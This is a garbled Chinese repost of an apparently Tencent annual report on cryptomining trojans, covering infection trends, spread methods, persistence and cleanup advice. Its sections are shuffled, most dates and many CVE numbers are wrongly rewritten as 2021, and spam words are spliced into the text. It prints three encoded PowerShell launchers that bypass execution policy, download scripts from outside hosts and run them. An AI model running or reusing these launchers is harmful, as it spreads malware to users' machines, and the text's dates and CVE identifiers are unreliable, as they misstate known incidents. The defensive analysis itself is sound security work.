BRC贝尔链

BTC市值波动刺激挖矿木马活跃,​ 腾讯安全发布2021年度挖矿木马报告

挖矿 2021-07-25 07:5557www.360aitou.net未知

3、2021挖矿木马感染趋势

多种病毒组合攻击


4.1.3 社交互联网
2021年12月御见威胁情报中心发现了通过社会工程骗术传播的“老虎”挖矿木马(LaofuMiner)。攻击者将远控木马程序伪装成“热门新闻”、“色情内容”、“隐私资料”、“诈骗方法”等文件名,通过社交互联网发送到目的电脑,受害者双击查询文件立刻被安装“大灰狼”远控木马。然后攻击者通过远控木马控制中毒电脑下载挖矿木马,中毒电脑随即沦为矿工。
用于钓鱼攻击的部分文件名如下:

升级组件漏洞被借助攻击声明


2.3.4 “匿影”
DTLMiner之后,2021年3月初出现了“匿影”挖矿木马。该木马大肆借助功能网盘和图床隐藏自己,并携带NSA武器库从而拥有在局域网横向传播的能力。“匿影”所用很多的公共服务如下:

4.2恶意代码实行

4.2.1 Powershell
2021年4月3日DTLMiner在Powershell中反射加载PE映像,达到 “无文件”形式实行挖矿程序。这种办法直接在Powershell.exe进程中运行恶意代码,注入“白进程”实行的方法可能导致难以测试和清除挖矿代码。这也是初次发现的,大规模借助“无文件”形式实行的挖矿木马。
DTLMiner在感染系统上安装计划任务,反复下载和实行一段加密的Powershell脚本,在脚本代码中嵌入了一段Base64编码的字符$Code64,该段字符事实上是XMRIG挖矿程序的二进制数据。

挖矿木马主要漏洞攻击种类


3.5.2 爆破攻击种类
挖矿木马主要的爆破攻击种类为SQL爆破,第二是IPC$和SSH。因为部分IT管理职员缺少安全意识,很多数据库和远程登录服务被设置为弱口令。SplashData公布的2021排行榜前五位的最差密码分别是“123456”、“123456789”、“qwerty”、“password”和“1234567”,这部分密码也是黑客在爆破攻击时的最佳选择。

挖矿木马通过内置的包含很多容易密码的字典进行自动匹配,比较容易破解此类弱口令并入侵系统。

3.2区域分布

从区域分布来看,2021年挖矿木马在全国各地均有分布,其中感染最紧急的区域分别为广东,浙江,北京,与江苏。

2.1 WannaCry

2021年5月12日,WannaCry蠕虫通过MS17-010漏洞在全球范围大爆发,感染了很多企业的计算机。该蠕虫感染计算机后向计算机中植入敲诈者病毒,致使电脑很多文件被加密,然后向受害者索要BTC作为恢复文件的赎金。

6.1 “永恒之蓝“漏洞

自2021年NSA武器泄漏以来,“永恒之蓝“漏洞被挖矿木马广泛借助。伴随各大安全厂家对该漏洞进行修复和防御,该漏洞的影响正在渐渐降低。但从数据上看,仍有约30%未安装“永恒之蓝“漏洞补丁,因此预计2021年大概出现新的借助“永恒之蓝“漏洞的挖矿木马。

腾讯御知测试Ah3ache struts2漏洞

5.2处置建议

如发现主机系统出现明显卡慢,或服务器出现进程长期超越80%CPU占用的现象,则可能感染了挖矿木马。可根据以下步骤进行确认和移除操作。
5.2.1感染确认

1)个人用户
a.通过Windows任务管理器(或PCHunter或Process Explorer)或Linux下用命令ps -aux ,找到高CPU占用的进程及其文件。若文件在系统目录下,在另一台机器上找到同名的正常系统文件与可疑文件进行对比;若在某软件目录下,找到该软件的同名正常文件与可疑文件进行对比。

Sality感染可实行文件


“剪切板大盗“木马通过剪切板内容中的字符格式特征判断ETH或BTC钱包地址,并将切板内容替换为指定钱包,若用户在此时粘贴并进行转账操作,数字资产便落入黑客的口袋:

“剪切板大盗“木马替换钱包地址

2021年挖矿木马活跃TOP榜

KingMiner关闭RDP服务

挖矿木马主要爆破攻击种类

挖矿进程CPU占用


b.用PCHunter或Linux下用命令netstat -tup 查找进程互联网连接的IP及端口,尤其是5559、7777、4444、13333等可疑远程端口连接。接着用该IP地址进行域名反查,注意指向该IP的域名中是不是包含“miner”,”pool”等字样。
若在以上a步骤中排除系统文件或正常软件文件,且该文件具备b中的可疑互联网连接,则可能感染挖矿木马。
2)企业用户
企业用户建议部署腾讯御界高级威胁测试系统,可辨别挖矿过程中的通信协议,从互联网流量中测试挖矿行为。

MyKings僵尸互联网清理建议


排查数据库作业名字,清除包含恶意代码的作业;
排查数据库存储过程,清理包含恶意代码的内容;
因为MyKings最新版本还会感染“暗云“MBR、Rookit等顽固病毒,用户可用电脑管家系统急救箱进行查杀清理,用指南及下载链接:https://guanjia.qq.com/avast/283/index.html

电脑管家系统急救箱清理MBR和内核级病毒

“匿影”用的公共服务

启动程序分别为:

/c"setA=power&call%A%shell-epbypass-eJABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBWAEQAbwBhAEMAJwA7ACQAeQA9ACcAaAB0AHQAcAA6AC8ALwB0AC4AdAByADIAcQAuAGMAbwBtAC4AYwBvAG0ALwB2AC4AagBzACcAOwAkAHoAPQAkAHkAKwAnAHAAJwArACcAPwBtAHMAXwAyADAAMQ酷有拿货网ADEAMgAyADcAJwA7ACQAbQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHkAKQA7AFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AF0AOgA6AEMAcgBlAGEAdABlACgAKQAuAEMAbwBtAHAAdQB0AGUASABhAHMAaAAoACQAbQApAHwAZgBvAHIAZQBhAGMAaAB7ACQAcwArAD0AJABfAC4AVABvAFMAdAByAGkAbgBnACgAJwB4ADIAJwApAH0AOwBpAGYAKAAkAHMALQBlAHEAJwBkADgAMQAwADkAYwBlAGMAMABhADUAMQA3ADEAOQBiAGUANgBmADQAMQAxAGYANgA3AGIAMwBiADcAZQBjADEAJwApAHsASQBFAFgAKAAtAGoAbwBpAG4AWwBjAGgAYQByAFsAXQBdACQAbQApAH0A"
/c"setA=power&call%A%shell-epbypass-eJABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBoAGEAZABwAGUAUgB6AFwAbwBBAEIAdwBYACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAGEAdwBjAG4AYQAuAGMAbwBtAC8AdgAuAGoAcwAnADsAJAB6AD0AJAB5ACsAJwBwACcAKwAnAD8AbQBzAF8AMgAwADEAOQAxADIAMgA3ACcAOwAkAG0APQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQ人工智能ABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBNAEQANQBdADoAOgBDAHIAZQBhAHQAZQAoACkALgBDAG8AbQBwAHUAdABlAEgAYQBzAGgAKAAkAG0AKQB8AGYAbwByAGUAYQBjAGgAewAkAHMAKwA9ACQAXwAuAFQAbwBTAHQAcgBpAG4AZwAoACcAeAAyACcAKQB9ADsAaQBmACgAJABzAC0AZQBxACcAZAA4ADEAMA酷有拿货网AGMAZQBjADAAYQA1ADEANwAxADkAYgBlADYAZgA0ADEAMQBmADYANwBiADMAYgA3AGUAYwAxACcAKQB7AEkARQBYACgALQBqAG8AaQBuAFsAYwBoAGEAcgBbAF0AXQAkAG0AKQB9AA=="
/c"setA=power&call%A%shell-epbypass-eJABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBsAEsATgBWAEYAagBDAEoAbQBcAG8AVwB1AFUAWABxAGwAJwA7ACQAeQA9ACcAaAB0AHQAcAA6AC8ALwB0AC4AYQBtAHgAbgB5AC4AYwBvAG0ALwB2AC4AagBzACcAOwAkAHoAPQAkAHkAKwAnAHAAJwArACcAPwBtAHMAXwAyADAAMQ酷有拿货网ADEAMgAyADcAJwA7ACQAbQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHkAKQA7AFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AF0AOgA6AEMAcgBlAGEAdABlACgAKQAuAEMAbwBtAHAAdQB0AGUASABhAHMAaAAoACQAbQApAHwAZgBvAHIAZQBhAGMAaAB7ACQAcwArAD0AJABfAC4AVABvAFMAdAByAGkAbgBnACgAJwB4ADIAJwApAH0AOwBpAGYAKAAkAHMALQBlAHEAJwBkADgAMQAwADkAYwBlAGMAMABhADUAMQA3ADEAOQBiAGUANgBmADQAMQAxAGYANgA3AGIAMwBiADcAZQBjADEAJwApAHsASQBFAFgAKAAtAGoAbwBpAG4AWwBjAGgAYQByAFsAXQBdACQAbQApAH0A"

挖矿木马主要入侵方法


3.5.1 漏洞攻击种类
挖矿木马攻击时借助的漏洞最主要种类为Windows系统漏洞(“永恒之蓝”),第二是WebLogic有关组件漏洞,Apache有关组件漏洞。常用于攻击的包括以下CVE编号的漏洞:
MS17-010“永恒之蓝”CVE-2021-0143
Weblogic反序列化任意代码实行漏洞CVE-2021-10271,CVE-2021-2628,CVE-2021-2725
Apache Struts2远程代码实行漏洞CVE-2021-5638
Apache Solr 远程代码实行漏洞CVE-2021-0193
Apache Tomcat远程代码实行漏洞CVE-2021-12615

2021年感染挖矿木马地区分布

漏洞借助工具ZombieBoy

Phorh3iex针对VNC服务爆破

4.1.5 感染型病毒
2021年4月感染型病毒Sality被发现借助打造的点对点互联网,传播以盗取、劫持虚拟币买卖为目的的“剪切板大盗“木马。
Sality可感染当地硬盘、可移动存储设施、远程共享目录下的可实行文件,同时会借助可移动、远程共享驱动器的自动播放功能进行感染,然后在中招系统下载并实行“剪切板大盗”木马。
Sality修改可实行文件的入口点,以病毒代码替换原始文件代码,使得所有被感染程序启动时实行病毒功能:

2021年挖矿木马日产量趋势

DTLMiner清理建议


删除随机名计划任务:“VDoaC”、"hadpeRz\oABwX"、"lKNVFjCJm\oWuUXql"

目录

3.1样本产量

依据腾讯安全御见威胁情报中心统计数据,2021年挖矿木马攻击呈“上升-降低-维持平稳”的趋势。数据显示,2021年上半年挖矿木马很活跃,高峰时检出攻击样本超越10万个/日;5月之后攻击趋势有所减缓,降低到了6万个/日,之后维持平稳。总体来看,挖矿木马在主机和服务器上都保有较大规模的感染量,使得挖矿木马成为企业面临的最紧急的安全威胁之一。

4.1传播特征

4.1.1 提供链感染
2021年底出现的DTLMiner是借助现有软件的升级功能进行木马分发,是提供链感染的典型案例。黑客在后台配置文件中插入木马下载链接,致使软件在升级时下载木马文件。因为软件本身拥有巨大的用户量,致使木马在短期内感染量很多的机器。

2.3 波动下跌

ZombieBoyMiner出现时(2021年12月)正值BTC价格的最高峰,之后开始波动下跌过程。接着,2021年3月,另一个借助“永恒之蓝”漏洞大范围攻击的挖矿蠕虫病毒WannaMiner被发现了。
2.3.1 WannaMiner
WannaMiner木马将染毒机器构建成一个健壮的僵尸互联网,并且支持内网自更新,最后目的为通过挖矿获利。因为其在内网传播过程中通过SMB进行内核攻击,可能导致企业内网很多机器出现蓝屏现象。依据统计数据,WannaMiner矿蠕虫感染量超越3万台。
WannaMiner的攻击步骤如下:

1、背景

2、币价曲线与重大安全事件
2.1WannaCry
2.2首次上涨
2.3波动下跌
2.4第二次上涨

3、2021挖矿木马感染趋势
3.1样本产量
3.2区域分布
3.3行业分布
3.4活跃家族
3.5主要入侵方法

4、2021挖矿木马技术特征
4.1传播特征
4.2恶意代码实行
4.3持久化攻击

5、挖矿木马防御和处置建议
5.1防御策略
5.2处置建议

6、挖矿木马的将来趋势
6.1“永恒之蓝“漏洞
6.2BlueKeep漏洞
6.3僵尸互联网

KingMiner安装计划任务


4.3.2 WMI计时器
KingMiner在WMI中创建为名为WindowsSystemUpdate_WMITimer的计时器,并将实行一段脚本代码的事件消费者WindowsSystemUpdate_consumer通过事件过滤器WindowsSystemUpdate _filter绑定到计时器。伴随计时器触发,每15分钟实行一次VBS脚本代码。

3.4活跃家族

2021年挖矿木马最活跃的三个家族分别为WannaMiner,MyKings,DTLMiner(永恒之蓝下载器木马)。其中MyKings是老牌的僵尸互联网家族,而WannaMiner和DTLMiner分别在2021年初和年底出现。在2021年这几个家族都有超越2万用户的感染量,他们的一同特征为借助“永恒之蓝”漏洞进行蠕虫式传播,用多类型的持久化攻击技术,难以被彻底清除。


5.2.3 清理僵尸互联网

DTLMiner篡改的配置文件


4.1.2 跨平台攻击
挖矿木马经历了从控制一般电脑到以控制企业主机为主,从只控制Windows挖矿到混合感染多个平台的变化。2021年腾讯御见威胁情报中心发现了”Agwl“,“美少女帮”,WannaMine,Satan等多个针对linux的挖矿木马。
2021年3月,Satan病毒出现最新变种,该变种病毒针对Windows系统和Linux系统进行无差别攻击,然后在中招电脑中植入勒索病毒勒索BTC、同时植入挖矿木马挖矿XMR币。

6.3僵尸互联网

MyKings、KingMiner、WannaMiner等挖矿僵尸互联网在前期感染了很多机器,控制系统后通过计划任务、数据库存储过程、WMI等技术进行持久化攻击,因而可随时从服务器下载最新版本的恶意代码,非常难被彻底清除。将来安全厂家与这部分病毒团伙在的对抗还会持续。

3.5主要入侵方法

2021年挖矿木马主要入侵方法前三名分别是漏洞攻击、弱口令爆破和借用僵尸互联网。因为挖矿木马需要获得更多的计算资源,所以借助常见存在的漏洞和弱口令,或者是控制很多机器的僵尸互联网进行大规模传播成为挖矿木马的最佳选择。

PCHunter删除挖矿木马启动项


2)Linux系统
下通过命令pkill -9退出进程;
删除进程文件,并检查crontab命令下显示的木马有关定时任务;
删除以下目录下木马有关定时任务;
/var/spool/cron/root/
/var/spool/cron/crontabs
删除以下目录下木马有关自启动项;
/etc/rcS.d/
/etc/rc.d/init.d/
企业用户可在服务器部署腾讯御点终端安全管理软件,对挖矿木马进行清理。

4、2021年挖矿木马的技术特征

LaofuMiner用的钓鱼文件


4.1.4 VNC爆破
2021年3月,Phorpiex僵尸互联网针对被广泛用的远程管理工具“VNC”默认端口5900进行爆破攻击,在高价值服务器上下载运行GandCrab 5.2勒索病毒加密要紧系统资料推行敲诈勒索;若攻破有数字虚拟货币买卖的电脑,则运行数字虚拟货币钱包劫持木马抢钱;若被攻击的只不过一般电脑则被植入XMR币挖矿木马,成为Phorpiex控制的矿工电脑。

KingMiner安装WMI计时器


4.3.3 阻断外部入侵
KingMiner判断计算机版本是不是受CVE-2021-0708漏洞的影响,同时判断计算机是不是安装指定的补丁kb4499175、kb4500331、KB4499149、KB4499180、KB4499164(这部分补丁是微软发布的CVE-2021-0708远程桌面服务远程代码实行漏洞的补丁号)。
假如没安装CVE-2021-0708补丁,则修改设置禁止其他机器通过远程桌面服务访问本机,以此来来阻止其他木马进入系统,从而达到独占挖矿资源的目的。

6.2BlueKeeh3漏洞

2021年5月15日,微软发布了针对远程桌面服务(Remote DeskTOP Services ,以前称为终端服务)的重要远程实行代码漏洞CVE-2021-0708的修复程序,该漏洞影响Windows的Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP等多个版本。攻击者一旦成功触发该漏洞,便可以在目的系统上实行任意代码。
2021年9月,大家注意到借助CVE-2021-0708漏洞的EXP代码已被公开发布至metasploit-framework的Pull requests中,经测试可以达成远程代码实行;同时在2021年十月挖矿蠕虫DTLMiner在其攻击模块中也已经加入了CVE-2021-0708漏洞测试代码,因此大家推断在2021年极大概出现借助该漏洞的新型挖矿木马。

Satan病毒跨平台攻击


大家发现黑产为了达成的利益最大化,还会将挖矿木马与勒索软件、远控后门、剪贴板大盗、DDOS等木马的打包进行混合攻击。以下列举2021年的7个时尚家族及其在攻击中植入的病毒类型:

腾讯御点修复系统漏洞

伪装成文档的Sodinokib勒索病毒


2021年6月之后,BTC价格开始缓慢下跌。在2021年下半年,也没出现影响较大的,新的挖矿木马家族。

2.4 第二次上涨

在“匿影”挖矿木马出现的同时,BTC价格重新恢复上涨。2021年3月至2021年6月,BTC价格由4000USD/比特币上涨至12000USD/比特币。

DTLMiner随机名计划任务

1、背景


2021年8月,国家发布支持深圳建设中国特点社会主义先行示范区的建议,其中提到,支持在深圳拓展数字虚拟货币研究与移动支付等革新应用。业内人士觉得,拓展数字虚拟货币研究将发挥数字经济的积极推动作用。
2009年BTC诞生,到今天已经第十年,创建于2014年的XMR币也已经到了第5年。以BTC,XMR币为代表的数字数字货币近年来已渐渐为大众所熟悉,不少人借助买卖数字虚拟货币赚取收益。
伴随数字经济的蓬勃进步,由此带来的数字资产安全问题也不断出现,依据数字虚拟货币的基本原理:不依赖特定货币机构发行、依据特定算法、通过很多的计算产生,使得“挖矿”成为最基本的获得数字数字货币的方法。而想要通过“挖矿”获得更多的币,唯一的渠道是提高算力,所以需要投入很多的资金用购买计算设施。
而黑客一直期望不投入资金就获得很多回报,“控制别的人的计算机进行挖矿计算”的想法自然地产生,这也就是“挖矿木马”的定义。“挖矿木马”的最早出现时间现在不可以确定,但开始大规模时尚于2021年初。
黑客入侵控制很多计算机并植入矿机程序后,借助计算机的CPU或GPU资源完成很多运算,从而获得数字数字货币。同时,黑产在暗网进行非法数据或数字武器售卖时大多数使用BTC作为买卖货币,致使数字数字货币成为黑灰产业的流通媒介,也催生了挖矿产业的持续兴盛。从2021年爆发之后,挖矿木马渐渐成为互联网世界主要的威胁之一。

6、挖矿木马的将来趋势

KingMiner借助的白文件签名

Base64编码的XMRig二进制数据


Powershell第一将$Code64解码为Bytes格式,然后调用Invoke-ReflectivePEInjection函数在内存中反射PE注入实行挖矿程序。

WannaMiner清理建议

3)DTLMiner(永恒之蓝下载器木马)

5.1防御策略

5.1.1 密码管理
服务器用安全的密码方案,尤其是SQL服务器的sa账号密码,切勿以下弱口令;
123456、admin、root、123456789、qwert、password、1234567、12345678、12345、lloveyou、111111、123123、888888、1234567890、88888888、666666等
5.1.2 端口管理
服务器暂时关闭非必须的端口(如135、139、445、3389),办法可参考:https://guanjia.qq.com/web_clinic/s8/585.html;
企业用户可部署腾讯T-sec高级威胁测试系统(腾讯御界),发现、追踪黑客攻击线索。腾讯T-sec高级威胁测试系统是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的大量数据,研发出的独特威胁情报和恶意测试模型系统。(https://s.tencent.com/product/gjwxjc/index.html)

腾讯御界高级威胁测试系统sqlserver爆破告警


5.1.3 Windows漏洞修复
依据微软通知准时修复以下Windows系统高危漏洞;

MS17-010永恒之蓝漏洞
XP、WindowsServer2003、win8等系统访问:
http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598
Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2021等系统访问:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx
Office公式编辑器漏洞 CVE-2021-11882
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-11882
Lnk漏洞CVE-2021-8464
https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2021-8464
IE漏洞 CVE-2021-8174
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-8174
RDP服务漏洞 CVE-2021-0708
Windows XP、Windows 2003:
https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2021-0708
Windows 7、Windows 2008R2:
https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175
Windows 2008:
https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499180
也可用腾讯御点或腾讯电脑管家进行漏洞扫描和修复。
(https://s.tencent.com/product/yd/index.html)

“PHPStudy“后门借助


2.3.3 DTLMiner
2021年12月爆发了DTLMiner(永恒之蓝下载器)挖矿木马。黑客通过入侵某公司服务器,修改某款软件的的升级配置文件,致使安装该软件的用户在升级时下载了木马文件。木马运行后又借助“永恒之蓝”漏洞在内网中迅速传播,致使仅2个小时受攻击用户就高达10万。
DTLMiner构建僵尸互联网后,在中招机器植入XMR币矿机程序挖矿。因为DTLMiner前期在短时时间内感染量很多机器,后续又持续更新,加入了MsSQL爆破、IPC$爆破、RDP爆破和Lnk漏洞借助等攻击手法,使得其在2021年一直维持活跃。

4.3持久化攻击

4.3.1 计划任务
KingMiner用RegisterTaskDefinition创建名为WindowsMonitor的计划任务,每15分钟实行一次Powershell脚本;或者安装在系统启动时实行的计划任务WindowsHelper,并在WindowsHelper中安装计划任务WindowsMonitor实行一次VBS脚本代码。

WannaMiner的攻击步骤


2.3.2 BuleHero
2021年8月出现了“最强漏洞攻击“的挖矿蠕虫病毒BuleHero。依据御见威胁情报中心持续跟踪结果,除去“永恒之蓝”漏洞外,BuleHero用了以下漏洞进行攻击:
LNK漏洞CVE-2021-8464
Tomcat任意文件上传漏洞CVE-2021-12615
Apache Struts2远程代码实行漏洞CVE-2021-5638
Weblogic反序列化任意代码实行漏洞CVE-2021-2628,CVE-2021-2725
Drupal远程代码实行漏洞CVE-2021-7600
Apache Solr 远程代码实行漏洞CVE-2021-0193
THinkphpV5漏洞CNDV-2021-24942
除去以上漏洞以外,BuleHero的最新版本还用了2021年9月20日浙江杭州警方公布的“PHPStudy“后门事件中披露的坐落于php_xmlrpc.dll模块中的漏洞。

5、挖矿木马防御和处置建议


sodinokibi

2021年6月,在BTC价格第三回升到高点时,sodinokibi勒索病毒爆发。该勒索病毒第一出现于2021年4月底,早期用web服务有关漏洞传播,与大名鼎鼎的GandCrab勒索病毒较为相似。此时GandCrab已宣布停止运营,sodinokibi几乎完全继承了GandCrab的传播途径。
6月左右,sodinokibi勒索病毒开始伪装成税务单位、司法机构,用钓鱼欺诈邮件来传播,因为系统默认设置不显示文件扩展名,伪装成doc文档的EXE病毒常被错误判断为文档而双击打开。


2)WannaMiner

御界测试挖矿行为


5.2.2 病毒移除
确认感染挖矿木马后,可用腾讯电脑管家清除,也可尝试根据以下步骤进行手工清除:
1)Windows系统
用PCHunter或其他管理工具退出可疑进程,删除进程文件,并在启动项、服务、计划任务中找到启动该文件映像的项目并删除。

1)MyKings

挖矿进程CPU占用


本报告第一介绍以BTC价格变化曲线为时间轴,在该期间发生的重大安全事件,然后概要2021年挖矿木马的总体趋势与技术特征,并给出了通用型和具备针对性的防御和处置建议,最后对挖矿木马的将来趋势作出预测。

参考链接


WannaCry蠕虫详细剖析
https://www.freebuf.com/articles/system/134578.html


WannaMiner挖矿木马攻击事件通报
https://mp.weixin.qq.com/s/FEyaQ_AHn2TZPy-5FeMP7A

ZombieBoy木马剖析
https://www.freebuf.com/column/157584.html


“VNC劫匪”攻击预警:中招企业遭遇GandCrab 5.2等多种病毒连环暴击
https://www.freebuf.com/column/198957.html


区块链火了Sality病毒,感染3万电脑伺机盗取BTC
https://www.freebuf.com/column/218404.html


针对SQL弱口令的爆破攻击再度袭来,KingMiner矿工已控制上万电脑
https://www.freebuf.com/column/221248.html


永恒之蓝木马下载器开创“无文件挖矿”新模式
https://www.freebuf.com/column/200241.html


GandCrab退出江湖 警惕继任者sodinokibi勒索病毒取而代之
https://www.freebuf.com/column/205215.html


BlueHero蠕虫再升级,新增震网3代武器库,看一眼就中招
https://www.freebuf.com/column/181604.html


蠕虫病毒bulehero第三借助“永恒之蓝”在企业内网攻击传播
https://www.freebuf.com/column/180544.html


BuleHero 4.0挖矿蠕虫真疯狂,超十种办法攻击企业互联网
https://www.freebuf.com/column/219973.html


支持在深圳拓展数字虚拟货币研究
https://finance.sina.com.cn/blockchain/coin/2021-08-19/doc-ihytcitn0105787.shtml


悄然崛起的矿机僵尸互联网:打服务器挖价值百万XMR币
https://www.freebuf.com/articles/web/146393.html


“驱动生活”木马详细剖析报告 2小时感染10万台电脑挖XMR币
https://www.freebuf.com/column/192021.html


一场精心策划的针对驱动生活企业的定向攻击活动剖析
https://www.freebuf.com/articles/system/192194.html

5.1.4 服务器组件漏洞修复

a. Oracle Weblogic任意代码实行漏洞
CVE-2021-10271
影响版本
OracleWebLogic Server10.3.6.0.0
OracleWebLogic Server12.1.3.0.0
OracleWebLogic Server12.2.1.1.0
OracleWebLogic Server12.2.1.2.0
官方补丁通知:
https://www.oracle.com/security-alerts/cpuoct2021.html
CVE-2021-2628
影响版本
Oracle WebLogic Server10.3.6.0
Oracle WebLogic Server12.2.1.2
Oracle WebLogic Server12.2.1.3
Oracle WebLogic Server12.1.3.0
官方补丁通知:
http://www.oracle.com/technetwork/security-advisory/cpuapr2021-3678067.html
CVE-2021-2725
影响版本
Oracle WebLogic Server10.3.6.0
Oracle WebLogic Server12.1.3.0
官方补丁通知:
https://www.oracle.com/security-alerts/alert-cve-2021-2725.html
b. Apache有关组件漏洞
Apache Struts2远程代码实行漏洞CVE-2021-5638
影响范围
Struts 2.3.5 – Struts 2.3.31
Struts 2.5 – Struts 2.5.10
官方补丁通知:
https://cwiki.apache.org/confluence/display/WW/S2-045?from=timeline&isappinstalled=0
Apache Solr 远程代码实行漏洞CVE-2021-0193
受影响版本
Apache Solr < 8.2.0
官方补丁通知:
https://issues.apache.org/jira/browse/SOLR-13669
Apache Tomcat远程代码实行漏洞CVE-2021-12615
影响版本
Apache Tomcat 7.0.0-7.0.79
官方补丁通知:
http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.81
也可用腾讯安全研发的御知互联网资产风险监测系统排查互联网资产的安全风险,对企业的互联网资产及各类应用的可用性、安全性与合规性等进行按期的安全扫描、持续性的风险预警和漏洞测试。(https://s.tencent.com/product/narms/index.html)

参考链接

3.3行业分布

从行业分布来看,2021年受挖矿木马影响最紧急的行业分别为网络,制造业,科研和技术服务与房产业。

BTC价格与安全事件


察看2021~2021年的BTC价格曲线和重大安全事件图,可以发目前此期间,“币价高位剧烈波动,安全事件层出不穷”,部分影响较大的攻击事件如下:

2021年挖矿木马影响行业分布

2、币价曲线与重大安全事件

DTLMiner反射注入实行挖矿程序


4.2.2 DLL侧加载
KingMiner最早于2021年6月中旬出现,是一种针对Windows服务器MSSQL进行爆破攻击的XMR币挖矿木马。攻击者使用多种逃避技术来绕过虚拟机环境和安全测试,致使一些反病毒引擎没办法准确查杀。
将来逃避杀软测试,KingMiner启动挖矿木马时使用DLL侧加载技术,也就是“白+黑”技术,借助正常的有数字签名的白文件来调用恶意DLL。其用到的有微软系统文件“Credential Backup andRestore Wizard”和多个知名企业的数字签名的文件:
“GuangZhou KuGou Computer Technology Co.,Ltd.”
“Google Inc”
“福建创意嘉和软件公司”

2.2 首次上涨

WannaCry蠕虫爆发后的半年时间内(即2021年5月至2021年12月),BTC价格呈爆发性增长,由1000USD/比特币上涨至17000USD/比特币。
WannaCry之后的一段时间内,没出现其他勒索病毒用“永恒之蓝”漏洞大规模传播的状况,然而挖矿木马却看从中到了“商业机会”。2021年下半年开始陆续有借助“永恒之蓝”攻击的挖矿木马,第一被发现的是大型僵尸互联网MyKings。
2.2.1 MyKings
Mykings僵尸互联网是迄今为止发现的最复杂的僵尸互联网之一,主要攻击特征为借助“永恒之蓝”漏洞和针对MsSQL,RDP,Telnet等服务进行密码爆破,然后在失陷主机植入挖矿模块,远程控制模块,并且借助扫描攻击模块进行蠕虫式传播。
2021年4月之后,MyKings传播量开始出现爆发式增长,正是其借助“永恒之蓝”漏洞武器攻击所致使。通过在僵尸互联网中安装XMR币矿机,借助服务器资源挖矿,MyKings的XMR币钱包已获得超越百万人民币的收益。
2.2.2 ZombieBoy
2021年12月腾讯御见威胁情报中心测试到一款挖矿木马,其PDB文件中发现了明文字符串“C:\Users\ZombieBoy\Documents\Visual Studio 2021\Projects\nc\Release\nc.pdb”,在网上通过关键词“ZombieBoy”进行查找,大家发现了一款“永恒之蓝”漏洞借助工具,推断黑客将此工具改造后于传播挖矿木马。大家依据特点将其其命名为ZombieBoyMiner,御见后台统计数据显示,该木马在高峰时期感染超越7万台电脑。

此文出于传递更多信息之目的,并不意味着同意其看法或证实其描述。本网站所提供的信息,只供参考之用。

贝尔链行情_BRC最新价格_贝尔链历史行情价格走势图-BRC贝尔链 Copyright © 2002-2021 BRC贝尔链 (http://www.hongkongfsdl.com) 网站地图 TAG标签 备案号